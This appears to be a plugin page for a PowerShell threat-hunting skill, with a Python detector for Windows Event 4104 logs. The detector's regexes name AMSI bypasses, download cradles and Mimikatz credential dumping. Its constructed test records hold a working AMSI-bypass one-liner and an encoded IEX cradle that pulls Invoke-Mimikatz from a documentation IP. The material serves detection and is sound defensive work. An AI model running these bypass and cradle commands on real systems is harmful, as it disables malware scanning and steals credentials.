From cybersec-toolkit
Analyzes Windows EVTX files to detect malicious PowerShell activity including obfuscated commands, AMSI bypasses, encoded payloads, and credential dumping via Script Block Logging (Event 4104).
Trigger: invoked by the user with the slash command /cybersec-toolkit:hunting-for-anomalous-powershell-execution, or auto-loaded by Claude when the skill summary below matches the task.
PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational channel) records each script block as the engine compiles it, so every layer an attacker unwraps at runtime (a Base64 -EncodedCommand payload, a string rebuilt with [char] arithmetic, text fed to Invoke-Expression from a download) is logged in the clear. That makes 4104 the primary data source for hunting malicious PowerShell. Two practical caveats: a long script block is split across several 4104 records that share a ScriptBlockId (MessageNumber of MessageTotal) and must be reassembled before pattern matching, and because 4104 shows the decoded script, the encoded form of the command line is only visible in process creation events. Combined with Module Logging (4103) and process creation (Security 4688 with command-line auditing enabled, or Sysmon Event ID 1), analysts can detect encoded commands, AMSI bypass patterns, download cradles, credential theft tools, and fileless techniques even through obfuscation layers.
Example summary output:

```json
{
  "total_events": 1247,
  "suspicious_events": 23,
  "amsi_bypass_attempts": 2,
  "encoded_commands": 8,
  "download_cradles": 5,
  "credential_access": 3
}
```
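As an added example (not the skill's own code; cybersec-toolkit's implementation is not shown on this page), here is a minimal stdlib-only Python hunt over 4104 and 4103 records rendered as EVTX-style XML, such as the per-record XML that python-evtx produces. It reassembles multi-part script blocks by ScriptBlockId, unwraps nested -EncodedCommand payloads (Base64 of UTF-16LE) and rescans them, and applies illustrative regexes for AMSI bypass, download cradles, credential access and obfuscation tells, producing a summary in the same shape as the JSON above. The signature lists, the obfuscation threshold, the record layout, the helper and function names, and the sample script text (including the documentation address 203.0.113.5) are all assumptions of this example, not facts about the plugin.

```python
import base64
import html
import re
import xml.etree.ElementTree as ET
from collections import defaultdict

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Signature families; keys double as summary counters. These regexes are illustrative
# assumptions and deliberately narrow; tune them against your own baseline.
PATTERNS = {
    "amsi_bypass_attempts": re.compile(r"amsiInitFailed|AmsiScanBuffer|AmsiUtils|amsiContext", re.I),
    "download_cradles": re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I),
    "credential_access": re.compile(r"Invoke-Mimikatz|sekurlsa|\blsass\b|DumpCreds|comsvcs\.dll.*MiniDump|Get-GPPPassword", re.I),
}
# -EncodedCommand and its short forms, followed by Base64 of UTF-16LE script text.
ENCODED_RE = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]{20,})", re.I)
# Obfuscation tells: backticks, [char] arithmetic, short-string concatenation, -f format-string
# reordering, reverse/replace/join tricks. Flagging at four tells per block is an assumed threshold.
OBFUSCATION_TELLS = [re.compile(p, re.I) for p in (
    r"`", r"\[char\]\s*\d+", r"'[^']{1,3}'\s*\+\s*'", r"\{\d\}", r"\[array\]::Reverse|\.Replace\(|-join")]

def parse_event(xml_text):
    """Return (EventID, {Data Name: text}) from one EVTX record rendered as XML."""
    root = ET.fromstring(xml_text)
    event_id = int(root.find("e:System/e:EventID", NS).text)
    return event_id, {d.get("Name"): (d.text or "") for d in root.iterfind("e:EventData/e:Data", NS)}

def reassemble_script_blocks(events):
    """Join 4104 fragments sharing a ScriptBlockId in MessageNumber order (they can arrive out of order)."""
    parts = defaultdict(dict)
    for event_id, data in events:
        if event_id == 4104:
            parts[data.get("ScriptBlockId", "")][int(data.get("MessageNumber", 1))] = data.get("ScriptBlockText", "")
    return {sid: "".join(t for _, t in sorted(frag.items())) for sid, frag in parts.items()}

def unwrap_layers(text, max_depth=3):
    """Return [text, decoded -EncodedCommand payloads, their payloads, ...]; bad Base64 is skipped."""
    layers, queue = [], [(text, 0)]
    while queue:
        cur, depth = queue.pop()
        layers.append(cur)
        for m in ENCODED_RE.finditer(cur) if depth < max_depth else ():
            try:
                queue.append((base64.b64decode(m.group(1), validate=True).decode("utf-16-le"), depth + 1))
            except (ValueError, UnicodeDecodeError):
                continue
    return layers

def hunt(xml_records):
    """Return (summary counters, {ScriptBlockId: sorted hit names}) for a list of XML records."""
    events = [parse_event(x) for x in xml_records]
    summary = dict.fromkeys(("total_events", "suspicious_events", "amsi_bypass_attempts",
                             "encoded_commands", "download_cradles", "credential_access", "obfuscated"), 0)
    summary["total_events"] = sum(1 for event_id, _ in events if event_id == 4104)
    findings = {}
    for sid, text in reassemble_script_blocks(events).items():
        layers = unwrap_layers(text)
        hits = {"encoded_commands"} if len(layers) > 1 else set()
        for layer in layers:  # scan the block and everything it unwraps to
            hits.update(name for name, rx in PATTERNS.items() if rx.search(layer))
            if sum(len(rx.findall(layer)) for rx in OBFUSCATION_TELLS) >= 4:
                hits.add("obfuscated")
        if hits:
            summary["suspicious_events"] += 1
            for h in hits:
                summary[h] += 1
            findings[sid] = sorted(hits)
    return summary, findings

def make_event_xml(event_id, **data):
    """Build a minimal EVTX-style XML record (constructed test data, not a real capture)."""
    fields = "".join(f'<Data Name="{k}">{html.escape(v)}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f"<Channel>Microsoft-Windows-PowerShell/Operational</Channel></System><EventData>{fields}</EventData></Event>")

def sample_events():
    """Constructed records; 203.0.113.5 is a documentation address, not a real C2."""
    enc = base64.b64encode(("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/Invoke-Mimikatz.ps1'); "
                            "Invoke-Mimikatz -DumpCreds").encode("utf-16-le")).decode()
    return [
        make_event_xml(4103, Payload='CommandInvocation(Get-ChildItem): "Get-ChildItem"'),  # module log; not a script block
        make_event_xml(4104, ScriptBlockId="b1", MessageNumber="1", MessageTotal="1",
                       ScriptBlockText="Get-ChildItem C:\\Users | Sort-Object Name"),
        make_event_xml(4104, ScriptBlockId="b2", MessageNumber="1", MessageTotal="1",
                       ScriptBlockText="[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
                                       ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"),
        # One cradle split across two records and delivered out of order: neither half matches alone.
        make_event_xml(4104, ScriptBlockId="b3", MessageNumber="2", MessageTotal="2",
                       ScriptBlockText="Request -Uri 'http://203.0.113.5/a.ps1' -UseBasicParsing; IEX $r.Content"),
        make_event_xml(4104, ScriptBlockId="b3", MessageNumber="1", MessageTotal="2", ScriptBlockText="$r = Invoke-Web"),
        make_event_xml(4104, ScriptBlockId="b4", MessageNumber="1", MessageTotal="1",
                       ScriptBlockText=f"powershell.exe -NoP -W Hidden -enc {enc}"),
        make_event_xml(4104, ScriptBlockId="b5", MessageNumber="1", MessageTotal="1",
                       ScriptBlockText="$x = 'I'+'n'+'vo'+'ke-Ex'+'pr'+'ess'+'ion'; & $x "
                                       "([char]87+[char]104+[char]111+[char]97+[char]109+[char]105 -join '')"),
    ]
```

Calling hunt(sample_events()) returns a summary of six 4104 records with four suspicious blocks (one AMSI bypass, one reassembled download cradle, one encoded command that unwraps to a second cradle plus Invoke-Mimikatz, one obfuscated block) and a per-ScriptBlockId list of hits. Two design points worth copying into a real hunt: count per reassembled block, not per raw record, or split scripts inflate your numbers; and rescan every decoded layer with the same signatures, since the interesting indicators usually sit one Base64 layer down.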
Install: npx claudepluginhub 26zl/cybersec-toolkit --plugin cybersec-toolkit